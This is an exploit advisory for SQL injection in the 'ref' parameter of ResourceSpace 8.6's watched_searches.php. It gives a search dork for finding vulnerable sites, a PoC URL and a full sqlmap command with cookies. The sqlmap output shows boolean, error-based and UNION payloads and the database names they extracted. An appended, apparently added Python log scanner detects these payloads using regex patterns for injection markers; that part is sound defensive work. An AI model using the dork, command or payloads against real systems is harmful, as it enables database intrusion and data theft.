"ResourceSpace 8.6 - 'watched_searches.php' SQL Injection"

Author

dd_

Platform

php

Release date

2019-02-04


# Exploit Title: ResourceSpace <=8.6 'watched_searches.php' SQL Injection
# Dork: intext:"Powered by ResourceSpace"
# Date: 2019-02-01
# Exploit Author: dd_ (info@malicious.group)
# Vendor Homepage: https://www.resourcespace.com/
# Software Link: https://www.resourcespace.com/get
# Version: Stable release: 8.6 (Minor: 12603)
# Tested on: PHP/MySQL (PHP 7.2 / MySQL 5.7.25-0ubuntu0.18.04.2-log)
# Research IRC: irc.blackcatz.org #blackcatz
# Vendor Banner: ResourceSpace open source digital asset management software is the simple, fast, & free way to organise your digital assets.


# POC:
# 1)
# http://resourcespace.local/plugins/rse_search_notifications/pages/watched_searches.php?offset=0&callback=checknow&ref=[SQL]&ajax=true&_=1548992497510



# Example:
#
[notroot@malicious ~]$ sqlmap -u 'http://resourcespace.local:80/plugins/rse_search_notifications/pages/watched_searches.php?offset=0&callback=checknow&ref=2'\''&ajax=true&_=1548992497510' --cookie='cookiecheck=true;language=en-US;user=d170aee58aadb30833490bc38aecc85b;thumbs=show;saved_col_order_by=created;saved_col_sort=ASC;per_page_list=15;saved_find=some;display=thumbs;saved_offset=0;per_page=48;saved_sort=DESC;restypes=1%2C2%2C3%2C4' --dbms=mysql --level=5 --risk=3 --technique=BEUST -p ref --dbs



[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 15:27:03 /2019-02-01/

[15:27:03] [WARNING] it appears that you have provided tainted parameter values ('ref=2'') with most likely leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
are you really sure that you want to continue (sqlmap could have problems)? [y/N] y
[15:27:03] [INFO] testing connection to the target URL
[15:27:03] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: ref (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: offset=0&callback=checknow&ref=2' AND 6321=6321# YBHT&ajax=true&_=1548992497510

    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
    Payload: offset=0&callback=checknow&ref=-5346 OR 1 GROUP BY CONCAT(0x716b6a6271,(SELECT (CASE WHEN (9852=9852) THEN 1 ELSE 0 END)),0x716b627671,FLOOR(RAND(0)*2)) HAVING MIN(0)#&ajax=true&_=1548992497510

    Type: UNION query
    Title: Generic UNION query (random number) - 12 columns
    Payload: offset=0&callback=checknow&ref=-5045 UNION ALL SELECT CONCAT(0x716b6a6271,0x676e72684e744a54485a747a4c5249684657485649744b416866756b7955614d646f636d457a7179,0x716b627671),6594,6594,6594,6594,6594,6594,6594,6594,6594,6594,6594-- ajba&ajax=true&_=1548992497510
---
[15:27:03] [INFO] testing MySQL
[15:27:04] [INFO] confirming MySQL
[15:27:04] [WARNING] reflective value(s) found and filtering out
[15:27:04] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.0
[15:27:04] [INFO] fetching database names
[15:27:04] [INFO] used SQL query returns 3 entries
[15:27:04] [INFO] resumed: 'information_schema'
[15:27:04] [INFO] resumed: 'mybb'
[15:27:04] [INFO] resumed: 'resourcespace'
available databases [3]:                                                                                                                                                                                         
[*] information_schema
[*] mybb
[*] resourcespace

[15:27:04] [INFO] fetched data logged to text files under '/home/notroot/.sqlmap/output/resourcespace.local'

[*] ending @ 15:27:04 /2019-02-01/
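The following is an added defender-side example, not code from the advisory, from ResourceSpace, or from sqlmap. It scans web server access log lines for requests to the endpoint and parameter named in the PoC above and flags any `ref` value that is not a plain record number, classifying it against the payload families the sqlmap session reports (boolean-based with a quote and `AND n=n`, UNION-based, and comment terminators such as `#` and `--`). The log format (Apache "combined"), the sample lines, the client addresses and the user agents are all constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoint and parameter named in the advisory's PoC URL.
WATCHED_SEARCHES = "/plugins/rse_search_notifications/pages/watched_searches.php"
INJECTED_PARAM = "ref"

# Apache "combined" log format (assumed); only the fields needed here are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Legitimate traffic to this endpoint carries a numeric ref (a record id);
# anything else is at least malformed and worth a look.
NUMERIC_REF = re.compile(r"^\d+$")

# Coarse indicators mirroring the payload families in the sqlmap output above.
INDICATORS = {
    "quote": re.compile("['\"]"),
    "boolean": re.compile(r"\b(?:AND|OR)\b\s+\d+\s*=\s*\d+", re.I),
    "union": re.compile(r"\bUNION\b.*\bSELECT\b", re.I | re.S),
    "comment": re.compile(r"(?:#|--\s|/\*)"),
}


def classify_ref(value):
    """Return the indicator names matched by a decoded ref value; [] for a plain numeric id."""
    if NUMERIC_REF.match(value):
        return []
    hits = [name for name, rx in INDICATORS.items() if rx.search(value)]
    return hits or ["non-numeric"]


def find_suspicious_requests(lines):
    """Return (ip, status, ref, indicators) for hits on the watched-searches endpoint."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable combined-format line
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith(WATCHED_SEARCHES):
            continue
        # parse_qs percent-decodes, so %27 and %23 become ' and # here.
        params = parse_qs(parts.query, keep_blank_values=True)
        for ref in params.get(INJECTED_PARAM, []):
            indicators = classify_ref(ref)
            if indicators:
                findings.append((m.group("ip"), int(m.group("status")), ref, indicators))
    return findings


# Constructed sample log lines: one benign request, two resembling the
# boolean-based and UNION payloads from the sqlmap session, one unrelated page.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Feb/2019:15:27:03 +0000] "GET /plugins/rse_search_notifications/pages/'
    'watched_searches.php?offset=0&callback=checknow&ref=2&ajax=true&_=1548992497510 HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Feb/2019:15:27:03 +0000] "GET /plugins/rse_search_notifications/pages/'
    'watched_searches.php?offset=0&callback=checknow&ref=2%27%20AND%206321%3D6321%23%20YBHT'
    '&ajax=true&_=1548992497510 HTTP/1.1" 200 512 "-" "constructed-scanner/1.0"',
    '10.0.0.9 - - [01/Feb/2019:15:27:04 +0000] "GET /plugins/rse_search_notifications/pages/'
    'watched_searches.php?offset=0&callback=checknow&ref=-5045%20UNION%20ALL%20SELECT%201%2C2%2C3'
    '--%20ajba&ajax=true&_=1548992497510 HTTP/1.1" 500 0 "-" "constructed-scanner/1.0"',
    '10.0.0.5 - - [01/Feb/2019:15:28:00 +0000] "GET /pages/search.php?search=ref%3D2%27 HTTP/1.1" '
    '200 1024 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, status, ref, indicators in find_suspicious_requests(SAMPLE_LOG):
        print(f"{ip} HTTP {status} ref={ref!r} -> {', '.join(indicators)}")
```

The check keys on the parameter's expected type rather than on a payload signature list: the advisory shows `ref` used as a numeric record id, so any non-numeric value is anomalous even before the indicator regexes run, which keeps encoded or obfuscated variants from slipping through. The same type expectation is what server-side validation of `ref` should enforce.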